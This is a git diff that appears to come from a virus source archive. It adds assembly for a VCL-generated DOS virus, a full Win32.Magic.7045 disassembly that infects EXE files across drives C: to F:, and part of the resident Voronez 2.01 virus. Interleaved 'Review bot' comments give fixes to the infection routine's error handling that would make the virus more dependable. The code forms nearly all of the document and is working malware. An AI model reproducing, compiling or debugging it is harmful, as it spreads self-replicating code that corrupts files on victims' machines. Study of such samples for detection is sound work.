; Return to caller + +path_string db "PATH=" ; The PATH string to search for +path_ad dd ? ; Holds the PATH's address +traverse_path endp + +found_subdir proc near + lds si,dword ptr [path_ad] ; DS:SI points to the PATH + lea di,[bp - 70] ; DI points to the work buffer + push cs ; Transfer CS into ES for + pop es ; byte transfer +move_subdir: lodsb ; Load the next byte into AL + cmp al,';' ; Have we reached a separator? + je moved_one ; If so we're done copying + or al,al ; Are we finished with the PATH? 
+ je moved_last_one ; If so get out of here + stosb ; Store the byte at ES:DI + jmp short move_subdir ; Keep transfering characters + +moved_last_one: xor si,si ; Zero SI to signal completion +moved_one: mov word ptr es:[path_ad],si; Store SI in the path address + ret ; Return to caller +found_subdir endp + + db 0FEh,0C9h,04Bh,0DFh,06Eh + + +find_files proc near + push bp ; Save BP + + mov ah,02Fh ; DOS get DTA function + int 021h + push bx ; Save old DTA address + + mov bp,sp ; BP points to local buffer + sub sp,128 ; Allocate 128 bytes on stack + + push dx ; Save file mask + mov ah,01Ah ; DOS set DTA function + lea dx,[bp - 128] ; DX points to buffer + int 021h + + mov ah,04Eh ; DOS find first file function + mov cx,00100111b ; CX holds all file attributes + pop dx ; Restore file mask +find_a_file: int 021h + jc done_finding ; Exit if no files found + call infect_file ; Infect the file! + jnc done_finding ; Exit if no error + mov ah,04Fh ; DOS find next file function + jmp short find_a_file ; Try finding another file + +done_finding: mov sp,bp ; Restore old stack frame + mov ah,01Ah ; DOS set DTA function + pop dx ; Retrieve old DTA address + int 021h + + pop bp ; Restore BP + ret ; Return to caller +find_files endp + + db 07Dh,0F9h,074h,000h,09Bh + +infect_file proc near + mov ah,02Fh ; DOS get DTA address function + int 021h + mov si,bx ; SI points to the DTA + + mov byte ptr [set_carry],0 ; Assume we'll fail + + cmp word ptr [si + 01Ch],0 ; Is the file > 65535 bytes? + jne infection_done ; If it is then exit + + cmp word ptr [si + 025h],'DN' ; Might this be COMMAND.COM? 
+ je infection_done ; If it is then skip it + + cmp word ptr [si + 01Ah],(finish - start) + jb infection_done ; If it's too small then exit + + mov ax,03D00h ; DOS open file function, r/o + lea dx,[si + 01Eh] ; DX points to file name + int 021h + xchg bx,ax ; BX holds file handle + + mov ah,03Fh ; DOS read from file function + mov cx,4 ; CX holds bytes to read (4) + mov dx,offset buffer ; DX points to buffer + int 021h + + mov ah,03Eh ; DOS close file function + int 021h + + push si ; Save DTA address before compare + mov si,offset buffer ; SI points to comparison buffer + mov di,offset flag ; DI points to virus flag + mov cx,4 ; CX holds number of bytes (4) + rep cmpsb ; Compare the first four bytes + pop si ; Restore DTA address + je infection_done ; If equal then exit + mov byte ptr [set_carry],1 ; Success -- the file is OK + + mov ax,04301h ; DOS set file attrib. function + xor cx,cx ; Clear all attributes + lea dx,[si + 01Eh] ; DX points to victim's name + int 021h + + mov ax,03D02h ; DOS open file function, r/w + int 021h + xchg bx,ax ; BX holds file handle + + push si ; Save SI through call + call encrypt_code ; Write an encrypted copy + pop si ; Restore SI + + mov ax,05701h ; DOS set file time function + mov cx,[si + 016h] ; CX holds old file time + mov dx,[si + 018h] ; DX holds old file date + int 021h + + mov ah,03Eh ; DOS close file function + int 021h + + mov ax,04301h ; DOS set file attrib. function + xor ch,ch ; Clear CH for file attribute + mov cl,[si + 015h] ; CX holds file's old attributes + lea dx,[si + 01Eh] ; DX points to victim's name + int 021h + +infection_done: cmp byte ptr [set_carry],1 ; Set carry flag if failed + ret ; Return to caller + +buffer db 4 dup (?) ; Buffer to hold test data +set_carry db ? 
; Set-carry-on-exit flag +infect_file endp + + +data00 db "I am your VIRAL MESSIAH",13,10 + db "Follow me and be redeemed",13,10 + db "Your data doth exist no more",13,10 + db "The FAT holds ashes of your dreams",13,10,0 + +vcl_marker db "[VCL]",0 ; VCL creation marker + + +note db "[Viral Messiah]",0 + db "Nowhere Man, [NuKE] '92",0 + +encrypt_code proc near + mov si,offset encrypt_decrypt; SI points to cipher routine + + xor ah,ah ; BIOS get time function + int 01Ah + mov word ptr [si + 8],dx ; Low word of timer is new key + + xor byte ptr [si],1 ; + xor byte ptr [si + 7],1 ; Change all SIs to DIs + xor word ptr [si + 10],0101h; (and vice-versa) + + mov di,offset finish ; Copy routine into heap + mov cx,finish - encrypt_decrypt - 1 ; All but final RET + push si ; Save SI for later + push cx ; Save CX for later + rep movsb ; Copy the bytes + + mov si,offset write_stuff ; SI points to write stuff + mov cx,5 ; CX holds length of write + rep movsb ; Copy the bytes + + pop cx ; Restore CX + pop si ; Restore SI + inc cx ; Copy the RET also this time + rep movsb ; Copy the routine again + + mov ah,040h ; DOS write to file function + mov dx,offset start ; DX points to virus + + call finish ; Encrypt/write/decrypt + + ret ; Return to caller + +write_stuff: mov cx,finish - start ; Length of code + int 021h +encrypt_code endp + +end_of_code label near + +encrypt_decrypt proc near + mov si,offset start_of_code ; SI points to code to decrypt + mov cx,(end_of_code - start_of_code) / 2 ; CX holds length +xor_loop: db 081h,034h,00h,00h ; XOR a word by the key + inc si ; Do the next word + inc si ; + loop xor_loop ; Loop until we're through + ret ; Return to caller +encrypt_decrypt endp +finish label near + +code ends + end main diff --git a/MSDOS/Virus.MSDOS.Unknown.voodoo.asm b/MSDOS/Virus.MSDOS.Unknown.voodoo.asm new file mode 100644 index 00000000..594ab129 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.voodoo.asm 
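Review bot: In infect_file neither DOS open (`mov ax,03D00h` and `mov ax,03D02h`, each followed by `int 021h` / `xchg bx,ax`) tests the carry flag, so on failure the DOS error code left in AX becomes the "handle" in BX and the following 3Fh read, the 40h write issued from encrypt_code via `call finish`, and the 3Eh close all act on whatever that small number denotes — likely one of the standard handles 0–4. A `jc infection_done` after the read-only open is sufficient there because set_carry is still 0 at that point; after the read/write open the failure branch must also do `mov byte ptr [set_carry],0` before reaching infection_done, otherwise find_files sees a success return and stops after a file that was never written. The 4301h attribute-clearing call in front of the r/w open is likewise unchecked, but it is the open result that decides where the write lands.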
@@ -0,0 +1,655 @@ +comment * + Win32.Magic.7045 + Disassembly by + Darkman/29A + + + + Win32.Magic.7045 is a 7045 bytes runtime/direct action EXE virus. Infects + all files in all directories at drive C:, D:, E: and F:, when executed, by + every file in current directory and Windows directory, when executed, by + prepending the virus to the original EXE file. + + Compile Win32.Magic.7045 with Turbo Assembler v 5.0 by typing: + TASM32 /M /ML /Q /ZD VOODOO.ASM + TLINK32 -Tpe -c -x -aa -r -v VOODOO.OBJ,,, IMPORT32 +* + +.386 +.model flat +; KERNEL32.dll + extrn CopyFileA:proc + extrn CloseHandle:proc + extrn CreateFileMappingA:proc + extrn CreateProcessA:proc + extrn DeleteFileA:proc + extrn CreateFileA:proc + extrn FindFirstFileA:proc + extrn FindNextFileA:proc + extrn FlushViewOfFile:proc + extrn GetCommandLineA:proc + extrn GetCurrentDirectoryA:proc + extrn GetExitCodeProcess:proc + extrn GetFileSize:proc + extrn ExitProcess:proc + extrn GetProcAddress:proc + extrn GetStartupInfoA:proc + extrn GlobalAlloc:proc + extrn GlobalFree:proc + extrn GlobalLock:proc + extrn GlobalUnlock:proc + extrn MapViewOfFile:proc + extrn ReadFile:proc + extrn SetCurrentDirectoryA:proc + extrn SetFileAttributesA:proc + extrn SetFileTime:proc + extrn Sleep:proc + extrn UnmapViewOfFile:proc + extrn lstrcpyA:proc + extrn GetModuleHandleA:proc +; USER32.dll + extrn MessageBoxA:proc + +.data +VirusSize equ 1b85h ; Size of virus (7045 bytes) +nBufferLength equ 320h ; Size, in characters, of directory + ; buffer +MAX_PATH equ 104h + +FALSE equ 00h +TRUE equ 01h +FILE_ATTRIBUTE_DIRECTORY equ 10h + ; The "file or directory" is a + ; directory +FILE_ATTRIBUTE_ARCHIVE equ 20h ; The file is an archive file. + ; Applications use this attribute to + ; mark files for backup or removal. +CREATE_NEW equ 01h ; Creates a new file. The function + ; fails if the specified file already + ; exists. +OPEN_EXISTING equ 03h ; Opens the file. The function fails + ; if the file does not exist. 
+FILE_SHARE_READ equ 01h ; Other open operations can be + ; performed on the file for read + ; access. If the CreateFile function + ; is opening the client end of a + ; mailslot, this flag is specified. +FILE_SHARE_WRITE equ 02h ; Other open operations can be + ; performed on the file for write + ; access. +GENERIC_WRITE equ 40000000h + ; Specifies write access to the file. + ; Data can be written to the file and + ; the file pointer can be moved. +GENERIC_READ equ 80000000h + ; Specifies read access to the file. + ; Data can be read from the file and + ; the file pointer can be moved. +PAGE_READWRITE equ 04h ; Gives read-write access to the + ; committed region of pages +FILE_MAP_WRITE equ 02h ; Read-write access + +NORMAL_PRIORITY_CLASS equ 20h ; Indicates a normal process with no + ; special scheduling needs. +INVALID_HANDLE_VALUE equ -01h + +STARTUPINFO struct + cb DWORD ? ; Specifies the size, in bytes, of the + ; structure. + lpReserved DWORD ? ; Reserved. Set this member to NULL + ; before passing the structure to + ; CreateProcess + lpDesktop DWORD ? ; Points to a zero-terminated string + ; that specifies either the name of + ; the desktop only or the name of both + ; the window station and desktop for + ; this process + lpTitle DWORD ? ; For console processes, this is the + ; title displayed in the title bar if + ; a new console window is created + dwX DWORD ? ; Specifies the x offset, in pixels, + ; of the upper left corner of a window + ; if a new window is created. The + ; offset is from the upper left corner + ; of the screen + dwY DWORD ? ; Specifies the y offset, in pixels, + ; of the upper left corner of a window + ; if a new window is created. The + ; offset is from the upper left corner + ; of the screen + dwXSize DWORD ? ; Specifies the width, in pixels, of + ; the window if a new window is + ; created + dwYSize DWORD ? ; Specifies the height, in pixels, of + ; the window if a new window is + ; created + dwXCountChars DWORD ? 
; Specifies the screen buffer width in + ; character columns + dwYCountChars DWORD ? ; Specifies the screen buffer height + ; in character rows + dwFillAttribute DWORD ? ; Specifies the initial text and + ; background colors if a new console + ; window is created + dwFlags DWORD ? ; This is a bit field that determines + ; whether certain STARTUPINFO members + ; are used when the process creates a + ; window + wShowWindow WORD ? ; Specifies the default value the first + ; time + cbReserved2 WORD ? ; Reserved; must be zero + lpReserved2 DWORD ? ; Reserved; must be NULL + hStdInput DWORD ? ; Specifies a handle that will be used + ; as the standard input handle of the + ; process + hStdOutput DWORD ? ; Specifies a handle that will be used + ; as the standard output handle of the + ; process + hStdError DWORD ? ; Specifies a handle that will be used + ; as the standard error handle of the + ; process +ends + +FILETIME struct + dwLowDateTime DWORD ? ; Specifies the low-order 32 bits of + ; the file time + dwHighDateTime DWORD ? ; Specifies the high-order 32 bits of + ; the file time +ends + +WIN32_FIND_DATA struct + dwFileAttributes DWORD ? ; Specifies the file attributes of the + ; file found + ftCreationTime FILETIME <> ; Specifies the time the file was + ; created + ftLastAccessTime FILETIME <> ; Specifies the time that the file was + ; last accessed + ftLastWriteTime FILETIME <> ; Specifies the time that the file was + ; last written to + nFileSizeHigh DWORD ? ; Specifies the high-order DWORD value + ; of the file size, in bytes + nFileSizeLow DWORD ? ; Specifies the low-order DWORD value + ; of the file size, in bytes + dwReserved0 DWORD ? ; Reserved for future use + dwReserved1 DWORD ? ; Reserved for future use + cFileName BYTE MAX_PATH dup(?) + ; A null-terminated string that is the + ; name of the file + cAlternate BYTE 0eh dup(?) ; A null-terminated string that is an + ; alternative name for the file +ends + +PROCESS_INFORMATION struct + hProcess DWORD ? 
; Handle to the newly created process + hThread DWORD ? ; Handle to the primary thread of the + ; newly created process + dwProcessId DWORD ? ; Global process identifier that can + ; be used to identify a process + dwThreadId DWORD ? ; global thread identifiers that can + ; be used to identify a thread +ends + +szFileName db '*.EXE',00h ; Name of file to search for +szFileName_ db '*.*',00h ; " " " " " " +szCurDir db 'c:\',00h ; Name of new current directory + db 'Magic People-Voodoo People !',00h + db 00h +ProcessInformation PROCESS_INFORMATION <> +dwExitCode dd ? ; Termination status +dwFileHandle dd ? ; File handle +dwFileHandle_ dd ? ; File handle +dwMappingHandle dd ? ; File mapping handle +lpMappedView dd ? ; Starting address of the mapped view +dwFileSize dd ? ; Low-order doubleword of the file + ; size +infect_flag db ? ; Infection flag +exit_flag db ? ; Exit flag +NumberOfBytesRead dd ? ; Number of bytes read +lpFileExtension dd ? ; Pointer to file extension +StartupInfo STARTUPINFO <> +szFileName__: + db 11ah dup(00h) + db 206h dup(?) +FindFileData WIN32_FIND_DATA <> + db 20eh dup(?) +cBuffer db VirusSize dup(?) + ; Buffer that receives data +dwSearchHandle dd ? ; Search handle +dwSearchHandle_ dd ? ; Search handle +szCurDir_: +cBuffer_ db 320h dup(?) ; Buffer for current directory +szCurDir__: +cBuffer__ db 320h dup(?) ; Buffer for current directory + db 724h dup(?) + +.code +code_begin: + push offset StartupInfo ; Address of STARTUPINFO structure + call GetStartupInfoA + + call GetCommandLineA + mov esi,eax ; ESI = pointer to the command-line + ; string for the current process + cmp byte ptr [esi+01h],':' ; Not Universal Naming Convention + ; (UNC)? + je _lstrcpyA ; Equal? 
Jump to _lstrcpyA + + inc eax ; Increase pointer to the command-line + ; string for the current process +_lstrcpyA: + push eax ; EAX = address of string to copy + push offset szFileName__ ; Address of buffer + call lstrcpyA + + lea esi,szFileName__ ; ESI = offset of szFileName__ +find_dot_in_filename: + inc esi ; Increase pointer to the command-line + ; string for the current process + + cmp byte ptr [esi],'.' ; Found dot in filename? + jne find_dot_in_filename ; Not equal? Jump to + ; find_dot_in_filename + mov byte ptr [esi+04h],00 ; Store zero at end of filename + mov [lpFileExtension],esi ; Store pointer to file extension + + push 00h ; Handle of file with attributes to + ; copy + push FILE_ATTRIBUTE_ARCHIVE ; File attributes + push OPEN_EXISTING ; How to create + push 00h ; Address of security descriptor + push FILE_SHARE_READ ; Share mode + push GENERIC_READ ; Access (read-write) mode + push offset szFileName__ ; Address of name of the file + call CreateFileA + mov [dwFileHandle],eax ; Store file handle + + push eax ; EAX = file handle + push 00h ; Address of structure for data + push offset NumberOfBytesRead + ; Address of number of bytes read + push VirusSize ; Number of bytes to read + push offset cBuffer ; Address of buffer that receives data + push eax ; Handle of file to read + call ReadFile + pop eax ; EAX = file handle + + push 00h ; Address of high-order word for file + ; size + push eax ; Handle of file to get size of + call GetFileSize + mov [dwFileSize],eax ; Store low-order doubleword of the + ; file size + cmp eax,VirusSize ; First generation? + je virus_exit ; Equal? Jump to virus_exit + + mov esi,[lpFileExtension] ; ESI = pointer to file extension + mov [esi],'MOC.' ; Store file extension + cmp [esi+05h],'$$$$' ; Temporarily disnfected file? + je _DeleteFileA ; Equal? 
Jump to _DeleteFileA + + push 00h ; Handle of file with attributes to + ; copy + push FILE_ATTRIBUTE_ARCHIVE ; File attributes + push CREATE_NEW + OPEN_EXISTING + ; How to create + push 00h ; Address of security descriptor + push FILE_SHARE_READ + FILE_SHARE_WRITE + ; Share mode + push GENERIC_READ + GENERIC_WRITE + ; Access (read-write) mode + push offset szFileName__ ; Address of name of the file + call CreateFileA + mov [dwFileHandle_],eax ; Store file handle + + push 00h ; Name of file-mapping object + push [dwFileSize] ; Low-order doubleword of object size + push 00h ; High-order doubleword of object size + push PAGE_READWRITE ; Protection for mapping object + push 00h ; Optional security attributes + push [dwFileHandle_] ; Handle of file to map + call CreateFileMappingA + mov [dwMappingHandle],eax ; Store file mapping handle + + push [dwFileSize] ; Low-order doubleword of object size + push 00h ; Low-order doubleword of file offset + push 00h ; High-order doubleword of file offset + push FILE_MAP_WRITE ; Access mode + push eax ; File-mapping object to map into + ; address space + call MapViewOfFile + mov [lpMappedView],eax ; Store starting address of the mapped + ; view + + push 00h ; Address of structure for data + push offset NumberOfBytesRead + ; Address of number of bytes read + push [dwFileSize] ; Low-order doubleword of object size + push eax ; Address of buffer that receives data + push [dwFileHandle] ; Handle of file to read + call ReadFile + + push 00h ; Number of bytes in range + push [lpMappedView] ; Starting address of the mapped view + call FlushViewOfFile + + push [lpMappedView] ; Address where mapped view begins + call UnmapViewOfFile + + push [dwMappingHandle] ; Handle of object to close + call CloseHandle + + push [dwFileHandle_] ; Handle of object to close + call CloseHandle + + push offset ProcessInformation + ; Pointer to PROCESS_INFORMATION + push offset StartupInfo ; Pointer to STARTUPINFO + push 00h ; Pointer to current directory name + 
push 00h ; Pointer to new environment block + push NORMAL_PRIORITY_CLASS ; Creation flags + push 00h ; Handle inheritance flag + push 00h ; Pointer to thread security + ; attributes + push 00h ; Pointer to process security + ; attributes + + mov esi,[lpFileExtension] ; ESI = pointer to file extension + mov byte ptr [esi+04h],' ' ; Store space at end of filename + + push offset szFileName__ ; Pointer to command line string + push 00h ; Pointer to name of executable module + call CreateProcessA + + jmp _CloseHandle +virus_exit: + mov [exit_flag],TRUE ; Exit code for all threads +_CloseHandle: + push [dwFileHandle] ; Handle of object to close + call CloseHandle + + call infect_drives + cmp [exit_flag],TRUE ; Exit code for all threads? + je _ExitProcess ; Equal? Jump to _ExitProcess +_GetExitCodeProcess: + push offset dwExitCode ; Address to receive termination + ; status + push [ProcessInformation.hProcess] + ; Handle to the process + call GetExitCodeProcess + cmp [dwExitCode],00h ; No error? + je _CreateProcessA ; Equal? Jump to _CreateProcessA + + jmp _GetExitCodeProcess +_CreateProcessA: + push offset ProcessInformation + ; Pointer to PROCESS_INFORMATION + push offset StartupInfo ; Pointer to STARTUPINFO + push 00h ; Pointer to current directory name + push 00h ; Pointer to new environment block + push NORMAL_PRIORITY_CLASS ; Creation flags + push 00h ; Handle inheritance flag + push 00h ; Pointer to thread security + ; attributes + push 00h ; Pointer to process security + ; attributes + + mov esi,[lpFileExtension] ; ESI = pointer to file extension + mov byte ptr [esi+04h],' ' ; Store space at end of filename + mov [esi],'EXE.' 
; Store file extension + mov [esi+05h],'$$$$' ; Store command-line + + push offset szFileName__ ; Pointer to command line string + push 00h ; Pointer to name of executable module + call CreateProcessA +_ExitProcess: + push 00h ; Exit code for all threads + call ExitProcess +_DeleteFileA: + push offset szFileName__ ; Address of name of file to delete + call DeleteFileA + + jmp _ExitProcess + +infect_drives proc near ; Infect drives + push offset cBuffer_ ; Address of buffer for current + ; directory + push nBufferLength ; Size, in characters, of directory + ; buffer + call GetCurrentDirectoryA + + call infect_directories + + mov ecx,04h ; Infect drive C:, D:, E: and F: +set_current_directory_loop: + push ecx ; ECX = counter + push offset szCurDir ; Address of name of new current + ; directory + call SetCurrentDirectoryA + + call infect_directories + + inc byte ptr [szCurDir] ; Increase drive letter + + pop ecx ; ECX = counter + loop set_current_directory_loop + + push offset szCurDir_ ; Address of name of new current + ; directory + call SetCurrentDirectoryA + + jmp _FindNextFileA + + ret ; Return + endp + +infect_directories proc near ; Infect directories + push offset cBuffer__ ; Address of buffer for current + ; directory + push nBufferLength ; Size, in characters, of directory + ; buffer + call GetCurrentDirectoryA + + push offset FindFileData ; Address of returned information + push offset szFileName_ ; Address of name of file to search + ; for + call FindFirstFileA + mov [dwSearchHandle],eax ; Store search handle +_FindNextFileA: + push offset FindFileData ; Address of returned information + push [dwSearchHandle] ; Handle of search + call FindNextFileA + or eax,eax ; Function failed? + jz function_failed ; Zero? Jump to function_failed + + cmp [FindFileData.cFileName],'.' + ; Directory? + je _FindNextFileA ; Equal? Jump to _FindNextFileA + mov eax,[FindFileData.dwFileAttributes] + and eax,FILE_ATTRIBUTE_DIRECTORY + ; Directory? + jz _FindNextFileA ; Zero? 
Jump to _FindNextFileA + + push offset szCurDir__ ; Address of name of new current + ; directory + call SetCurrentDirectoryA + + push offset FindFileData.cFileName + ; Address of name of new current + ; directory + call SetCurrentDirectoryA + + push offset FindFileData ; Address of returned information + push offset szFileName ; Address of name of file to search + ; for + call FindFirstFileA + mov [dwSearchHandle_],eax ; Store search handle + cmp eax,INVALID_HANDLE_VALUE + je _FindNextFileA ; Function failed? Jump to + ; _FindNextFileA +continue_a_file_search: + or eax,eax ; Function failed? + jz _FindNextFileA ; Zero? Jump to _FindNextFileA + + call infect_file + + push offset FindFileData ; Address of returned information + push [dwSearchHandle_] ; Handle of search + call FindNextFileA + + jmp continue_a_file_search +function_failed: + ret ; Return + endp + +infect_file proc near ; Infect file + push FILE_ATTRIBUTE_ARCHIVE ; Address of attributes to set + push offset FindFileData.cFileName + ; Address of filename + call SetFileAttributesA + + push 00h ; Handle of file with attributes to + ; copy + push FILE_ATTRIBUTE_ARCHIVE ; File attributes + push OPEN_EXISTING ; How to create + push 00h ; Address of security descriptor + push FILE_SHARE_READ + FILE_SHARE_WRITE + ; Share mode + push GENERIC_READ + GENERIC_WRITE + ; Access (read-write) mode + push offset FindFileData.cFileName + ; Address of name of the file + call CreateFileA + cmp eax,INVALID_HANDLE_VALUE + je _SetFileAttributesA ; Function failed? 
Jump to + ; _SetFileAttributesA + mov [dwFileHandle],eax ; Store file handle + + push 00h ; Address of high-order word for file + ; size + push eax ; Handle of file to get size of + call GetFileSize + mov [dwFileSize],eax ; Store low-order doubleword of the + ; file size +_CreateFileMappingA: + push eax ; EAX = low-order doubleword of the + ; file size + + push 00h ; Name of file-mapping object + push eax ; Low-order doubleword of object size + push 00h ; High-order doubleword of object size + push PAGE_READWRITE ; Protection for mapping object + push 00h ; Optional security attributes + push [dwFileHandle] + call CreateFileMappingA + mov [dwMappingHandle],eax ; Store file mapping handle + + push 00h ; Low-order doubleword of file offset + push 00h ; High-order doubleword of file offset + push FILE_MAP_WRITE ; Access mode + push eax ; File-mapping object to map into + ; address space + call MapViewOfFile + + cmp [infect_flag],TRUE ; Infect file? + je infect_file_ ; Equal? Jump to infect_file_ + + mov esi,eax ; ESI = starting address of the mapped + ; view + mov edi,[esi+3ch] ; EDI = offset of new executable (NE, + ; LE,etc) header within disk file + cmp dword ptr [esi+edi],'EP' + ; Portable Executable (PE)? + jne infect_exit ; Not equal? Jump to infect_exit + cmp [esi+6fh],'3NIW' + je infect_exit ; Equal? 
Jump to infect_exit + + call _UnmapViewOfFile + + mov [infect_flag],TRUE ; Infect file + + mov eax,[dwFileSize] ; EAX = Low-order doubleword of the + ; file size + add eax,VirusSize ; Add size of virus to low-order + ; doubleword of the file size + jmp _CreateFileMappingA +infect_file_: + mov [infect_flag],FALSE ; Don't infect file + mov [lpMappedView],eax ; Store starting address of the mapped + ; view + + push edi esi ecx ; Save registers at stack + pushf ; Save flags at stack + add eax,[dwFileSize] ; Add low-order doubleword of the file + ; size to starting address of the + ; mapped view + add eax,VirusSize-01h ; Add size of virus minus one to + ; starting address of the mapped view + mov edi,eax ; EDI = pointer to last byte of file + mov esi,[lpMappedView] ; ESI = starting address of the mapped + ; view + add esi,[dwFileSize] ; Add low-order doubleword of the file + ; size to starting address of the + ; mapped view + mov ecx,[dwFileSize] ; ECX = low-order doubleword of the + ; file size + dec esi ; ESI = pointer to last byte of + ; original code + std ; Set direction flag + rep movsb ; Move original code to end of file + + mov edi,[lpMappedView] ; EDI = starting address of the mapped + ; view + xor eax,eax ; Zero EAX + mov ecx,VirusSize ; Store seven thousand and forty-five + ; bytes + cld ; Clear direction flag + rep stosb ; Overwrite the first seven thousand + ; and forty-five bytes of original + ; code + + mov edi,[lpMappedView] ; EDI = starting address of the mapped + ; view + lea esi,cBuffer ; ESI = offset of cBuffer + mov ecx,VirusSize ; Move seven thousand and forty-five + ; bytes + cld ; Clear direction flag + rep movsb ; Move virus to beginning of file + popf ; Load flags from stack + pop ecx esi edi ; Load registers from stack +infect_exit: + call _UnmapViewOfFile + + push offset FindFileData.ftLastWriteTime-08h + ; Time the file was last written + push offset FindFileData.ftLastAccessTime-04h + ; Time the file was last accessed + push offset 
FindFileData.ftCreationTime + ; Time the file was created + push [dwFileHandle] ; Identifies the file + call SetFileTime + + push [dwFileHandle] ; Handle of object to close + call CloseHandle +_SetFileAttributesA: + push [FindFileData.dwFileAttributes] + ; Address of attributes to set + push offset FindFileData.cFileName + ; Address of filename + call SetFileAttributesA + + ret ; Return + endp + +_UnmapViewOfFile proc near ; Unmaps a mapped view of a file from + ; the calling process's address space + ; and close it + push [lpMappedView] ; Address where mapped view begins + call UnmapViewOfFile + + push [dwMappingHandle] ; Handle of object to close + call CloseHandle + + ret ; Return + endp +code_end: + +end code_begin \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.vor_1600.asm b/MSDOS/Virus.MSDOS.Unknown.vor_1600.asm new file mode 100644 index 00000000..7a0d586a --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vor_1600.asm 
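Review bot: This listing is filed under MSDOS/ as Virus.MSDOS.Unknown.voodoo.asm, but the source is a Win32 PE prepender (`.386`, `.model flat`, KERNEL32/USER32 externs, the TASM32/TLINK32 build line in the header), so the path misclassifies the sample for anyone triaging the archive by platform; a header comment such as `; NOTE: Win32 PE prepender (TASM32/TLINK32), not an MS-DOS sample; misfiled under MSDOS/` would at least record that. The header prose also overstates the spread: infect_drives walks the current directory and then `c:\` through `f:\` by incrementing the drive letter in `szCurDir`, and nothing in the code touches a Windows directory, while `CopyFileA`, `Sleep`, `GetProcAddress`, `GetModuleHandleA`, `MessageBoxA` and the `Global*` externs are declared but never called in this listing, which is worth stating for analysts comparing the import table against observed behaviour. In infect_drives the `ret` after `jmp _FindNextFileA` is unreachable, since the routine ends by jumping into infect_directories' FindNextFile loop (apparently reusing whatever `dwSearchHandle` was left from the last call) and returns from there; a one-line comment like `; jumps into infect_directories' loop; the ret below is never reached` would save readers a second pass. The file also ends without a trailing newline, which the diff flags explicitly.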
@@ -0,0 +1,1063 @@ +;======================================================= +; Virus Voronez 2.01 (August 1991 Zielona Gora, Poland) +; +; Disassembled by Andrzej Kadlof 1991 August +; +; (C) Polish Section Of Virus Information Bank +;======================================================= + +1EE6 9A19240657 call 5706:2419 + +; victim code + +1EEB 1E push ds +1EEC B82325 mov ax,2523 + +;... +; +;------------------- +; virus entry point + +2419 8CD8 mov ax,ds +241B 0E push cs +241C 1F pop ds +241D 50 push ax +241E E80000 call 2421 ; get own offset +2421 5B pop bx + +2422 81EB0801 sub bx,0108 ; virus base +2426 53 push bx + +; is virus present in RAM? + +2427 B4AB mov ah,AB ; call for resident part +2429 CD21 int 21 + +242B 3D5555 cmp ax,5555 ; expected answer +242E 7503 jne 2433 ; not instaled + +2430 E9D000 jmp 2503 ; instaled, exit + +; install wirus in RAM + +2433 8CC0 mov ax,es ; PSP segment +2435 2D0100 sub ax,0001 ; MCB segment +2438 8ED8 mov ds,ax +243A BB0300 mov bx,0003 ; offset of size of block in MCB +243D 3E8B07 mov ax,ds:[bx] ; get size +2440 2DEA00 sub ax,00EA ; reserve 0EA0h bytes for virus (3744) +2443 3E8907 mov ds:[bx],ax ; store new block size +2446 06 push es ; restore DS +2447 1F pop ds +2448 BB0200 mov bx,0002 ; offset of MEM size in PSP +244B 3E8B07 mov ax,ds:[bx] ; get MEM size +244E 2DEA00 sub ax,00EA ; decrease by 3744 bytes +2451 3E8907 mov ds:[bx],ax ; set new value in PSP +2454 8EC0 mov es,ax ; segment for new virus location +2456 BF0001 mov di,0100 ; offset of destination +2459 BE0001 mov si,0100 ; offset of source +245C 5B pop bx ; virus base +245D 53 push bx +245E 01DE add si,bx ; start of virus code +2460 0E push cs ; set DS to virus code +2461 1F pop ds +2462 B9A406 mov cx,06A4 ; length (1700) +2465 F3A4 rep movsb ; move to new place +2467 8BD0 mov dx,ax ; segment of new location +2469 EB74 jmp 24DF ; continue +246B 90 nop + +;------------------ +; INT 21h handler + +246C 9C pushf +246D FB sti +246E 80FCAB cmp ah,AB ; virus call 
+2471 7505 jne 2478 ; no + +2473 B85555 mov ax,5555 ; answer: I'm here +2476 9D popf +2477 CF iret + +2478 3D003D cmp ax,3D00 ; open file for read only +247B 7540 jne 24BD + +; open file for read only + +247D 50 push ax +247E 53 push bx +247F 51 push cx +2480 52 push dx +2481 56 push si +2482 57 push di +2483 06 push es +2484 B94100 mov cx,0041 ; maximum path length +2487 30C0 xor al,al +2489 8BFA mov di,dx ; offset of path +248B 1E push ds +248C 07 pop es +248D F2AE repnz scasb ; find end of string +248F 83EF04 sub di,0004 ; point at extension +2492 8BF7 mov si,di +2494 56 push si ; offset of extension +2495 0E push cs +2496 07 pop es +2497 B90400 mov cx,0004 ; extension length +249A BF8902 mov di,0289 ; is it EXE? +249D F3A6 rep cmpsb +249F 83F900 cmp cx,0000 +24A2 7504 jne 24A8 + +24A4 5E pop si ; balance stack +24A5 EB0D jmp 24B4 ; skip exe comparison +24A7 90 nop + +24A8 BF8C02 mov di,028C ; is it exe? +24AB B90400 mov cx,0004 +24AE 5E pop si ; offset of extension +24AF F3A6 rep cmpsb +24B1 83F900 cmp cx,0000 + +; restore callers registers + +24B4 07 pop es +24B5 5F pop di +24B6 5E pop si +24B7 5A pop dx +24B8 59 pop cx +24B9 5B pop bx +24BA 58 pop ax +24BB 7409 je 24C6 ; exe file, contaminate it! 
+ +; not EXE file, maybe COM or subfunction <> 3D00h + +24BD 50 push ax ; store subfunction code +24BE FEC4 inc ah ; hide 4B00h comparison +24C0 3D004C cmp ax,4C00 ; "terminate" proces +24C3 58 pop ax ; restore subfunction +24C4 7513 jne 24D9 ; jump to old INT 21h + +; EXE file will be open for read only or any file will be loaded and executed +; store caller registers again + +24C6 50 push ax +24C7 53 push bx +24C8 51 push cx +24C9 52 push dx +24CA 56 push si +24CB 57 push di +24CC 06 push es +24CD 1E push ds +24CE E91F01 jmp 25F0 ; contaminate + +; jump to old INT 21h + +24D1 1F pop ds +24D2 07 pop es +24D3 5F pop di +24D4 5E pop si +24D5 5A pop dx +24D6 59 pop cx +24D7 5B pop bx +24D8 58 pop ax + +24D9 9D popf +24DA EA60147902 jmp 0279:1460 ; old INT 21h + +; ^^^^^^^^ old INT 21h (place holder) +;--------------------- +; continue instalation + +; get INT 21h + +24DF 8EDA mov ds,dx ; DS points at new virus location +24E1 B82135 mov ax,3521 +24E4 CD21 int 21 +24E6 3E891EC201 mov ds:[01C2],bx ; modify own code +24EB 3E8C06C401 mov ds:[01C4],es +24F0 3E891E7503 mov ds:[0375],bx +24F5 3E8C067703 mov ds:[0377],es + +; set new 